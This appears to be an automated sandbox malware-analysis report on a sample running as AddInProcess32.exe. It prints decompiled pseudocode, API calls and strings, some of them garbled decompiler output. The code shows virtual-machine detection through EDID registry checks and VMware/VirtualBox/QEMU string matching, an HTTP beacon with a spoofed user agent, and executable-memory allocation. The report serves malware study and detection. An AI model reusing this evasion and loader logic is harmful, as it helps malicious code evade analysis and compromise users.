Show Windows behavior

Registry Activities

Key Opened

LPC Port Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Disassembly

Analysis Process: AddInProcess32.exePID: 4740, Parent PID: 6596COMMON

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	24%
Signature Coverage:	12.8%
Total number of Nodes:	1311
Total number of Limit Nodes:	4

Executed Functions

Function 02B5372C Relevance: 43.6, APIs: 15, Strings: 14, Instructions: 142
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E02B5372C(void* __edi, void* __esi, void* __eflags, short _a4) {
				WCHAR* _v0;
				signed int _v8;
				void _v12;
				long _v16;
				long _v20;
				void _v24;
				intOrPtr _v28;
				long _v32;
				void* _v36;
				void* _v40;
				WCHAR* _v48;
				char _v704;
				char _v708;
				short _v2108;
				WCHAR* _v2120;
				WCHAR* _v2124;
				WCHAR* _v2128;
				WCHAR* _v2132;
				intOrPtr _v2136;
				WCHAR* _v2140;
				void* _v2148;
				WCHAR* _v2152;
				char* _v2156;
				void* __ebx;
				signed int _t55;
				intOrPtr _t61;
				intOrPtr _t65;
				void* _t67;
				WCHAR* _t120;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr _t128;
				void* _t130;
				void* _t134;
				WCHAR* _t135;
				void* _t140;
				WCHAR* _t142;
				signed int _t147;

				_t55 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t55 ^ _t147;
				 *0x2b593a8 = 0; // executed
				E02B533DB(0, __edi, __esi); // executed
				if( *0x2b59474 != 0) {
					lstrcpyA( &_v708, "(1):");
					E02B5355B(0,  &_v704, __edi, __esi);
					_t124 =  &_v708;
					_t134 = _t124 + 1;
					do {
						_t61 =  *_t124;
						_t124 = _t124 + 1;
					} while (_t61 != 0);
					MultiByteToWideChar(0, 0,  &_v708, _t124 - _t134,  &_v2108, 0x104);
					_t126 =  &_v708;
					_t135 = _t126 + 1;
					do {
						_t65 =  *_t126;
						_t126 = _t126 + 1;
					} while (_t65 != 0);
					_t128 = _t126 - _t135 + _t126 - _t135;
					if(_t128 >= 0x578) {
						E02B53D67();
						asm("int3");
						_push(_t147);
						_push(0);
						_push(__esi);
						_t142 = 0;
						_v2156 = L"text/*";
						_push(__edi);
						_v2124 = 0;
						_t120 = _t135;
						_v2136 = _t128;
						_v2140 = 0;
						_v2120 = 0;
						_v2132 = 0;
						_v2128 = 0;
						_v2152 = 0;
						_t67 = InternetOpenW(L"Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413", 0, 0, 0, 0);
						_v2148 = _t67;
						if(_t67 != 0) {
							_t130 = InternetConnectW(_t67, _t120, _a4, 0x2b542bc, 0x2b542bc, 3, 0, 0);
							_v36 = _t130;
							if(_t130 != 0) {
								_t72 =  !=  ? 0x84803000 : 0x84003000;
								_v12 =  !=  ? 0x84803000 : 0x84003000;
								_t140 = HttpOpenRequestW(_t130, L"GET", _v0, L"HTTP/1.1", 0,  &_v48, 0x84003000, 0);
								if(_t140 != 0) {
									if(_v28 != 0) {
										_v16 = 4;
										InternetQueryOptionW(_t140, 0x1f,  &_v12,  &_v16);
										_v12 = _v12 | 0x00000080;
										InternetSetOptionW(_t140, 0x1f,  &_v12, 4);
									}
									_t142 = HttpSendRequestW(_t140, _t142, _t142, _t142, _t142);
									if(_t142 != 0) {
										_v20 = 4;
										_t142 = HttpQueryInfoW(_t140, 0x20000013,  &_v24,  &_v20,  &_v32);
										if(_t142 != 0) {
											_t142 =  !=  ? 0 : _t142;
										}
									} else {
										GetLastError();
									}
									InternetCloseHandle(_t140);
								}
								InternetCloseHandle(_v36);
							}
							InternetCloseHandle(_v40);
						}
						return _t142;
					} else {
						_push(__esi);
						 *((short*)(_t147 + _t128 - 0x838)) = 0;
						if(StrStrIW( &_v2108, L"VMware") == 0 && StrStrIW( &_v2108, L"VirtualBox") == 0 && StrStrIW( &_v2108, L"VBox") == 0 && StrStrIW( &_v2108, L"QEMU") == 0 && StrStrIW( &_v2108, L"Western Disk") == 0 && StrStrIW( &_v2108, L" HARDDISK") == 0) {
							lstrcpyA( &_v708, "(2):");
							E02B52E5C(0,  &_v704, __edi, StrStrIW);
							if(StrStrIA( &_v708, "VMware") != 0 || StrStrIA( &_v708, "VirtualBox") != 0 || StrStrIA( &_v708, "VBox") != 0 || StrStrIA( &_v708, "QEMU") != 0 || StrStrIA( &_v708, "Display Adapter") != 0 && StrStrIA( &_v708, "Non-PnP") != 0) {
								goto L19;
							}
						}
						goto L21;
					}
				} else {
					L21:
					return E02B53C33(_v8 ^ _t147);
				}
			}

0x02b53735
0x02b5373c
0x02b53742
0x02b53748
0x02b53753
0x02b53767
0x02b53773
0x02b53778
0x02b5377e
0x02b53781
0x02b53781
0x02b53783
0x02b53784
0x02b537a0
0x02b537a6
0x02b537ac
0x02b537af
0x02b537af
0x02b537b1
0x02b537b2
0x02b537b8
0x02b537c0
0x02b538ff
0x02b53904
0x02b53905
0x02b5390b
0x02b5390c
0x02b5390d
0x02b5390f
0x02b53916
0x02b5391d
0x02b53925
0x02b53927
0x02b5392a
0x02b5392d
0x02b53930
0x02b53933
0x02b53936
0x02b53939
0x02b5393f
0x02b53944
0x02b53966
0x02b53968
0x02b5396d
0x02b53980
0x02b53984
0x02b539a0
0x02b539a4
0x02b539ad
0x02b539b2
0x02b539c1
0x02b539c7
0x02b539d7
0x02b539d7
0x02b539e8
0x02b539ec
0x02b539f9
0x02b53a15
0x02b53a19
0x02b53a24
0x02b53a24
0x02b539ee
0x02b539ee
0x02b539ee
0x02b53a28
0x02b53a28
0x02b53a2d
0x02b53a2d
0x02b53a32
0x02b53a32
0x02b53a3c
0x02b537c6
0x02b537c6
0x02b537cf
0x02b537e7
0x02b53867
0x02b53873
0x02b5388e
0x00000000
0x00000000
0x02b5388e
0x00000000
0x02b538ed
0x02b53755
0x02b538ee
0x02b538fe
0x02b538fe

APIs

Part of subcall function 02B533DB: RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\ControlSet001\Enum\DISPLAY,00000000,00000009,?), ref: 02B53405
Part of subcall function 02B533DB: RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B53442
Part of subcall function 02B533DB: RegCloseKey.ADVAPI32(?), ref: 02B53546

lstrcpyA.KERNEL32(?,(1):), ref: 02B53767
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 02B537A0
StrStrIW.SHLWAPI(?,VMware), ref: 02B537E3
StrStrIW.SHLWAPI(?,VirtualBox), ref: 02B537F9
StrStrIW.SHLWAPI(?,VBox), ref: 02B5380F
StrStrIW.SHLWAPI(?,QEMU), ref: 02B53825
StrStrIW.SHLWAPI(?,Western Disk), ref: 02B5383B
StrStrIW.SHLWAPI(?, HARDDISK), ref: 02B53851
lstrcpyA.KERNEL32(?,(2):), ref: 02B53867
StrStrIA.SHLWAPI(?,VMware), ref: 02B5388A
StrStrIA.SHLWAPI(?,VirtualBox), ref: 02B5389C
StrStrIA.SHLWAPI(?,VBox), ref: 02B538AE

Strings

HARDDISK, xrefs: 02B53845
QEMU, xrefs: 02B53819
(2):, xrefs: 02B5385B
Display Adapter, xrefs: 02B538C6
Non-PnP, xrefs: 02B538D8
QEMU, xrefs: 02B538B4
VMware, xrefs: 02B537DD
VBox, xrefs: 02B538A2
VirtualBox, xrefs: 02B537ED
VBox, xrefs: 02B53803
(1):, xrefs: 02B5375B
VirtualBox, xrefs: 02B53890
Western Disk, xrefs: 02B5382F
VMware, xrefs: 02B53884

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: lstrcpy$ByteCharCloseInfoMultiOpenQueryWide
String ID: HARDDISK$(1):$(2):$Display Adapter$Non-PnP$QEMU$QEMU$VBox$VBox$VMware$VMware$VirtualBox$VirtualBox$Western Disk
API String ID: 1860444428-2002398593
Opcode ID: c56404748d35d231faca52375ce520f55a45932a12c8f683e8483b51a7c86c6b
Instruction ID: 7f9a5c09d5d497de349f2ca76c884c7a9fa4cd0a04b8062efd1815e68d050abe
Opcode Fuzzy Hash: c56404748d35d231faca52375ce520f55a45932a12c8f683e8483b51a7c86c6b
Instruction Fuzzy Hash: F4414F70D41339DAEF14EAA0DC94FAD77FCAF04A84F0444E5AD06DB100EB79A6859FA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B5308A Relevance: 49.2, APIs: 20, Strings: 8, Instructions: 218
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E02B5308A(void* __ebx, short* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v208;
				char _v408;
				char _v1295;
				void* _v1300;
				char _v1313;
				void* _v1318;
				char _v1331;
				void* _v1336;
				char _v1349;
				void* _v1354;
				intOrPtr _v1404;
				char _v1408;
				short _v1920;
				char _v2120;
				short _v2632;
				void* _v2636;
				int _v2640;
				void* _v2644;
				int* _v2648;
				int _v2652;
				int _v2656;
				short* _v2660;
				int _v2664;
				int _v2668;
				int _v2672;
				int _v2676;
				signed int _t70;
				long _t73;
				int _t82;
				long _t94;
				long _t99;
				long _t110;
				char _t120;
				CHAR* _t123;
				long _t127;
				intOrPtr _t129;
				void* _t135;
				CHAR* _t149;
				char _t154;
				void* _t156;
				void* _t159;
				signed int _t161;

				_t70 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t70 ^ _t161;
				_v2640 = 0x3e8;
				_v2660 = __ecx;
				_v2648 = 0;
				_t73 = RegOpenKeyExW(0x80000002, __ecx, 0, 9,  &_v2644); // executed
				if(_t73 != 0 || RegQueryInfoKeyW(_v2644, 0, 0, 0,  &_v2656,  &_v2676, 0,  &_v2672,  &_v2668,  &_v2664, 0, 0) != 0) {
					L23:
					return E02B53C33(_v8 ^ _t161);
				} else {
					_t82 = _v2656 - 1;
					_push(__edi);
					_t156 = RegCloseKey;
					_v2652 = _t82;
					if(_t82 < 0) {
						L22:
						RegCloseKey(_v2644); // executed
						goto L23;
					}
					_t135 = lstrcatA;
					_push(__esi);
					_t159 = lstrcpyA;
					do {
						_v2632 = 0;
						RegEnumKeyW(_v2644, _t82,  &_v2632, 0x100); // executed
						_v1920 = 0;
						E02B52C9C( &_v1920, _v2660);
						StrCatW( &_v1920, "\\");
						StrCatW( &_v1920,  &_v2632);
						_t94 = RegOpenKeyExW(0x80000002,  &_v1920, 0, 9,  &_v2636); // executed
						if(_t94 == 0) {
							_v2640 = 0x3e8;
							_v1408 = 0;
							_t127 = RegQueryValueExA(_v2636, "Driver", 0, 0,  &_v1408,  &_v2640); // executed
							if(_t127 == 0) {
								RegCloseKey(_v2636); // executed
								_t129 = E02B52FD4(_t135,  &_v1408, _t156, _t159); // executed
								_v2648 = _t129;
								lstrcpyA( &_v2120,  &_v1408);
							}
						}
						StrCatW( &_v1920, L"\\Device Parameters");
						_t99 = RegOpenKeyExW(0x80000002,  &_v1920, 0, 9,  &_v2636); // executed
						if(_t99 == 0) {
							_v2640 = 0x3e8;
							_v1408 = 0;
							_t110 = RegQueryValueExW(_v2636, L"EDID", 0, 0,  &_v1408,  &_v2640); // executed
							if(_t110 != 0 || _v1408 != 0xffffff00 || _v1404 != 0xffffff) {
								lstrcpyA( &_v208, "No EDID!");
								goto L20;
							} else {
								 *0x2b59474 =  *0x2b59474 + 1;
								RegCloseKey(_v2636);
								_t154 = 0;
								_t115 =  !=  ? _t154 :  &_v1349;
								_t147 =  !=  ?  !=  ? _t154 :  &_v1349 :  &_v1331;
								_t117 =  !=  ?  !=  ?  !=  ? _t154 :  &_v1349 :  &_v1331 :  &_v1313;
								_t149 =  !=  ?  !=  ?  !=  ?  !=  ? _t154 :  &_v1349 :  &_v1331 :  &_v1313 :  &_v1295;
								if(_t149 == 0) {
									lstrcpyA( &_v208, "BAD EDID!");
									 *0x2b59474 =  *0x2b59474 + 1;
									goto L20;
								}
								_t120 = _t154;
								if( *_t149 == 0xa) {
									L14:
									 *((char*)(_t120 + _t149)) = _t154;
									lstrcpyA( &_v208, _t149);
									_t123 =  &_v208;
									if(_v2648 == 0) {
										_push("(NotActive)");
									} else {
										_push("(IsActive)");
									}
									lstrcatA(_t123, ??);
									goto L20;
								} else {
									goto L13;
								}
								do {
									L13:
									_t120 = _t120 + 1;
								} while ( *((char*)(_t120 + _t149)) != 0xa);
								goto L14;
							}
						}
						L20:
						_v408 = 0;
						lstrcatA( &_v408, "--Nm:");
						lstrcatA( &_v408,  &_v208);
						E02B52D16(0x2b593a8,  &_v408, 0xc8);
						_t82 = _v2652 - 1;
						_v2652 = _t82;
					} while (_t82 >= 0);
					goto L22;
				}
			}

0x02b53093
0x02b5309a
0x02b530a0
0x02b530b0
0x02b530c2
0x02b530c8
0x02b530d0
0x02b533cc
0x02b533da
0x02b53113
0x02b53119
0x02b5311c
0x02b5311d
0x02b53123
0x02b53129
0x02b533c3
0x02b533c9
0x00000000
0x02b533cb
0x02b5312f
0x02b53135
0x02b53136
0x02b5313c
0x02b53143
0x02b53158
0x02b5316c
0x02b53173
0x02b53184
0x02b53198
0x02b531b5
0x02b531bd
0x02b531c5
0x02b531e6
0x02b531ec
0x02b531f4
0x02b531fc
0x02b53204
0x02b53209
0x02b5321d
0x02b5321d
0x02b531f4
0x02b5322b
0x02b53248
0x02b53250
0x02b5325c
0x02b5327d
0x02b53283
0x02b5328b
0x02b5336f
0x00000000
0x02b532b1
0x02b532b7
0x02b532bd
0x02b532d1
0x02b532d2
0x02b532e5
0x02b532f8
0x02b5330b
0x02b53310
0x02b53359
0x02b5335b
0x00000000
0x02b5335b
0x02b53315
0x02b53317
0x02b53320
0x02b53320
0x02b5332b
0x02b53334
0x02b5333a
0x02b53343
0x02b5333c
0x02b5333c
0x02b5333c
0x02b53349
0x00000000
0x00000000
0x00000000
0x00000000
0x02b53319
0x02b53319
0x02b53319
0x02b5331a
0x00000000
0x02b53319
0x02b5328b
0x02b53371
0x02b53373
0x02b53385
0x02b53395
0x02b533a7
0x02b533b2
0x02b533b6
0x02b533b6
0x00000000
0x02b533c2

APIs

RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?,00000000), ref: 02B530C8
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B53105
RegEnumKeyW.ADVAPI32(?,?,?,00000100), ref: 02B53158
StrCatW.SHLWAPI(?,02B54480), ref: 02B53184
StrCatW.SHLWAPI(?,?), ref: 02B53198
RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?), ref: 02B531B5
RegQueryValueExA.KERNELBASE(?,Driver,00000000,00000000,?,000003E8), ref: 02B531EC
RegCloseKey.KERNELBASE(?), ref: 02B531FC

Part of subcall function 02B52FD4: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 02B5306A

lstrcpyA.KERNEL32(?,?), ref: 02B5321D
StrCatW.SHLWAPI(?,\Device Parameters), ref: 02B5322B
RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?), ref: 02B53248
RegQueryValueExW.KERNELBASE(?,EDID,00000000,00000000,?,000003E8), ref: 02B53283
RegCloseKey.ADVAPI32(?), ref: 02B532BD
lstrcpyA.KERNEL32(?,?), ref: 02B5332B
lstrcatA.KERNEL32(?,(NotActive)), ref: 02B53349
lstrcpyA.KERNEL32(?,BAD EDID!), ref: 02B53359
lstrcpyA.KERNEL32(?,No EDID!), ref: 02B5336F
lstrcatA.KERNEL32(?,--Nm:), ref: 02B53385
lstrcatA.KERNEL32(?,?), ref: 02B53395
RegCloseKey.KERNELBASE(?), ref: 02B533C9

Strings

BAD EDID!, xrefs: 02B5334D
\Device Parameters, xrefs: 02B5321F
EDID, xrefs: 02B53272
No EDID!, xrefs: 02B53363
(NotActive), xrefs: 02B53343
Driver, xrefs: 02B531DB
--Nm:, xrefs: 02B5337F
(IsActive), xrefs: 02B5333C

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: lstrcpy$CloseOpenQuerylstrcat$EnumValue$DevicesDisplayInfo
String ID: (IsActive)$(NotActive)$--Nm:$BAD EDID!$Driver$EDID$No EDID!$\Device Parameters
API String ID: 3539320493-878170080
Opcode ID: 54d96ae3322c40133f133b92702a75b0fea06e66485431993fe1d9d7087c6a63
Instruction ID: 12465a584bf6c84ce719640fefe936f839dada52fd8ff82a576c8c8f6967ef53
Opcode Fuzzy Hash: 54d96ae3322c40133f133b92702a75b0fea06e66485431993fe1d9d7087c6a63
Instruction Fuzzy Hash: 62915C71E44328AFEB21CB60DC44FEAB7BCEF49241F0445DAA90EA6150EB749E848F11

Uniqueness

Uniqueness Score: -1.00%

Function 01380000 Relevance: 40.7, APIs: 1, Strings: 26, Instructions: 208
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00008000,00001000,00000040,?,uJQWVBObOOL@#,?,dFWsQL@bGGQFPP#,?,oLBGoJAQBQZb#), ref: 0138021A

Strings

#, xrefs: 01380109
#, xrefs: 01380125
#, xrefs: 013800D9
dFWsQL@bGGQFPP#, xrefs: 01380160
#, xrefs: 01380111
#, xrefs: 013800F9
F, xrefs: 013800CD
uJQWVBObOOL@#, xrefs: 0138018A
F, xrefs: 013800E5
O, xrefs: 013800ED
O, xrefs: 0138011D
G, xrefs: 0138010D
h, xrefs: 013800C5
#, xrefs: 01380129
#, xrefs: 01380121
#, xrefs: 01380119
#, xrefs: 013800E9
Q, xrefs: 013800D5
#, xrefs: 01380101
M, xrefs: 013800DD
#, xrefs: 013800D1
#, xrefs: 013800E1
#, xrefs: 013800F1
O, xrefs: 01380115
#, xrefs: 013800C9
oLBGoJAQBQZb#, xrefs: 01380136

Memory Dump Source

Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: #$#$#$#$#$#$#$#$#$#$#$#$#$#$F$F$G$M$O$O$O$Q$dFWsQL@bGGQFPP#$h$oLBGoJAQBQZb#$uJQWVBObOOL@#
API String ID: 4275171209-3179062328
Opcode ID: a667f0704a7d82f616ddd1e21fc4d9f6a3294f9a3529670c392b19acac27728d
Instruction ID: 8f26b30fb2c0545950e6913ff4e307dd33eafcba25c90c3465dccd7e36d5866d
Opcode Fuzzy Hash: a667f0704a7d82f616ddd1e21fc4d9f6a3294f9a3529670c392b19acac27728d
Instruction Fuzzy Hash: 99B1BB70D083CDDAEB05DBE8D4997EEBFB15F16308F180099D6457B282C3BA5548CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403CE9 Relevance: 39.2, APIs: 1, Strings: 25, Instructions: 175
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00403CE9() {

				asm("invalid");
				 *0x45C60582 = 0x64;
				 *0x45C60583 = 0x46;
				 *0x45C60584 = 0x57;
				 *0x45C60585 = 0x6e;
				 *0x45C60587 = 0x47;
				 *0x45C60588 = 0x56;
				 *0x45C60589 = 0x4f;
				 *0x45C6058A = 0x46;
				asm("rol byte [esi-0x3a], 0x45");
				 *0x45C6058B = 0x6b;
				 *0x45C6058C = 0x42;
				 *0x45C6058E = 0x4d;
			}

0x00403ce9
0x00403cee
0x00403cf2
0x00403cf6
0x00403cfa
0x00403d02
0x00403d06
0x00403d0a
0x00403d0e
0x00403d10
0x00403d12
0x00403d16
0x00403d1a

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,dFWnLGVOFkBMGOFb#,?,uJQWVBObOOL@#,00000068), ref: 00403E61

Strings

M, xrefs: 00403D4A
#, xrefs: 00403D56
O, xrefs: 00403D82
#, xrefs: 00403D36
#, xrefs: 00403D6E
#, xrefs: 00403D86
uJQWVBObOOL@#, xrefs: 00403DBC
O, xrefs: 00403D5A
#, xrefs: 00403D7E
dFWnLGVOFkBMGOFb#, xrefs: 00403DE8
#, xrefs: 00403D5E
F, xrefs: 00403D3A
F, xrefs: 00403D52
#, xrefs: 00403D3E
#, xrefs: 00403D66
h, xrefs: 00403D32
G, xrefs: 00403D7A
#, xrefs: 00403D96
Q, xrefs: 00403D42
O, xrefs: 00403D8A
#, xrefs: 00403D4E
#, xrefs: 00403D8E
#, xrefs: 00403D46
#, xrefs: 00403D76
#, xrefs: 00403D92

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: AllocVirtual
String ID: #$#$#$#$#$#$#$#$#$#$#$#$#$#$F$F$G$M$O$O$O$Q$dFWnLGVOFkBMGOFb#$h$uJQWVBObOOL@#
API String ID: 4275171209-2024267467
Opcode ID: 8d5d883060cc9150a05710e582697f4ca895b5f8adf5ff47d59d0031821a50da
Instruction ID: dcf4675412af51c673b628ccfd695aecf6fe8e9418b7ad345c6cd616ce72be28
Opcode Fuzzy Hash: 8d5d883060cc9150a05710e582697f4ca895b5f8adf5ff47d59d0031821a50da
Instruction Fuzzy Hash: 7B91F970D08388CEEB11CBE8D5997DDBFB1AF16308F1401A9D549AF382C3BA5985CB56

Uniqueness

Uniqueness Score: -1.00%

Function 02B533DB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E02B533DB(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				short _v520;
				short _v1032;
				void* _v1036;
				void* _v1040;
				int _v1044;
				int _v1048;
				int _v1052;
				int _v1056;
				int _v1060;
				int _v1064;
				signed int _t31;
				long _t34;
				long _t55;
				long _t61;
				void* _t64;
				void* _t71;
				int _t74;
				signed int _t75;

				_t71 = __edi;
				_t64 = __ebx;
				_t31 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t31 ^ _t75;
				_t34 = RegOpenKeyExW(0x80000002, L"SYSTEM\\ControlSet001\\Enum\\DISPLAY", 0, 9,  &_v1036); // executed
				if(_t34 != 0) {
					L10:
					return E02B53C33(_v8 ^ _t75);
				}
				if(RegQueryInfoKeyW(_v1036, 0, 0, 0,  &_v1044,  &_v1060, 0,  &_v1056,  &_v1052,  &_v1048, 0, 0) != 0) {
					L9:
					RegCloseKey(_v1036);
					goto L10;
				} else {
					_t74 = _v1044;
					while(1) {
						_t74 = _t74 - 1;
						if(_t74 < 0) {
							goto L9;
						}
						_v1032 = 0;
						RegEnumKeyW(_v1036, _t74,  &_v1032, 0x100); // executed
						_v520 = 0;
						E02B52C9C( &_v520, L"SYSTEM\\ControlSet001\\Enum\\DISPLAY");
						StrCatW( &_v520, "\\");
						StrCatW( &_v520,  &_v1032);
						_t55 = RegOpenKeyExW(0x80000002,  &_v520, 0, 9,  &_v1040); // executed
						if(_t55 == 0) {
							_t61 = RegQueryInfoKeyW(_v1040, 0, 0, 0,  &_v1064,  &_v1060, 0,  &_v1056,  &_v1052,  &_v1048, 0, 0);
							if(_t61 == 0) {
								if(_v1064 != _t61) {
									E02B5308A(_t64,  &_v520, _t71, _t74); // executed
								}
								RegCloseKey(_v1040);
							}
						}
					}
					goto L9;
				}
			}

0x02b533db
0x02b533db
0x02b533e4
0x02b533eb
0x02b53405
0x02b5340d
0x02b5354c
0x02b5355a
0x02b5355a
0x02b5344a
0x02b53540
0x02b53546
0x00000000
0x02b53450
0x02b53450
0x02b53537
0x02b53537
0x02b5353a
0x00000000
0x00000000
0x02b53462
0x02b53477
0x02b5348a
0x02b53491
0x02b534a2
0x02b534b6
0x02b534d3
0x02b534db
0x02b5350e
0x02b53516
0x02b5351e
0x02b53526
0x02b53526
0x02b53531
0x02b53531
0x02b53516
0x02b534db
0x00000000
0x02b53537

APIs

RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\ControlSet001\Enum\DISPLAY,00000000,00000009,?), ref: 02B53405
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B53442
RegEnumKeyW.ADVAPI32(?,?,?,00000100), ref: 02B53477
StrCatW.SHLWAPI(?,02B54480), ref: 02B534A2
StrCatW.SHLWAPI(?,?), ref: 02B534B6
RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?), ref: 02B534D3
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B5350E
RegCloseKey.ADVAPI32(?), ref: 02B53531
RegCloseKey.ADVAPI32(?), ref: 02B53546

Strings

SYSTEM\ControlSet001\Enum\DISPLAY, xrefs: 02B533FB, 02B53485

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: CloseInfoOpenQuery$Enum
String ID: SYSTEM\ControlSet001\Enum\DISPLAY
API String ID: 938792220-4245451955
Opcode ID: ada36984a414456eb4f95f64f14468dfa1f342e4c40e7b411c3d41fd9bd7b0b8
Instruction ID: 51ebdb338656fd409632222aec1f878416bda2637916f028697a32fd308e9bcb
Opcode Fuzzy Hash: ada36984a414456eb4f95f64f14468dfa1f342e4c40e7b411c3d41fd9bd7b0b8
Instruction Fuzzy Hash: AE41ECB294023CAADB219B60DD49FEBB7BCEF04240F4445E5BB09E6111EB309AD58F64

Uniqueness

Uniqueness Score: -1.00%

Function 02B5145F Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 38
libraryloadertimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				struct _FILETIME _v12;
				_Unknown_base(*)()* _t5;
				void* _t13;

				_t5 = GetProcAddress(LoadLibraryA("ntdll"), "RtlRandomEx");
				 *0x2b5947c = _t5;
				_t21 = _t5;
				if(_t5 != 0) {
					GetSystemTimeAsFileTime( &_v12);
					asm("adc eax, 0xfe624e21");
					 *0x2b59478 = E02B53E90(_v12.dwLowDateTime + 0x2ac18000, _v12.dwHighDateTime, 0x989680, 0); // executed
					_t13 = E02B5372C(__edi, __esi, _t21); // executed
					if(_t13 == 0) {
						E02B5138F(__ebx, __edi, __esi);
					}
				}
				TerminateProcess(GetCurrentProcess(), 0); // executed
				return 1;
			}

0x02b51475
0x02b5147b
0x02b51480
0x02b51482
0x02b51488
0x02b514a1
0x02b514ad
0x02b514b2
0x02b514b9
0x02b514bb
0x02b514bb
0x02b514b9
0x02b514c9
0x02b514d5

APIs

LoadLibraryA.KERNEL32(ntdll,RtlRandomEx), ref: 02B5146E
GetProcAddress.KERNEL32(00000000), ref: 02B51475
GetSystemTimeAsFileTime.KERNEL32(?), ref: 02B51488
__aulldiv.LIBCMT ref: 02B514A8

Part of subcall function 02B5138F: GetModuleHandleA.KERNEL32(00000000), ref: 02B513B1
Part of subcall function 02B5138F: VirtualQuery.KERNEL32(00000000,?,00001000), ref: 02B513C6

GetCurrentProcess.KERNEL32(00000000), ref: 02B514C2
TerminateProcess.KERNELBASE(00000000), ref: 02B514C9

Strings

Nqt, xrefs: 02B51475
RtlRandomEx, xrefs: 02B51464
ntdll, xrefs: 02B51469

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: ProcessTime$AddressCurrentFileHandleLibraryLoadModuleProcQuerySystemTerminateVirtual__aulldiv
String ID: RtlRandomEx$ntdll$Nqt
API String ID: 491243650-2249084123
Opcode ID: 8db0a9dd6af13a53eee8f2e293350d40a5596e0dc37122c688ebc00219d0ab0f
Instruction ID: fd3bc3ee58b7b887c60e0f3cdf4cfb045be20461a978b0e161e5f634aed4bb69
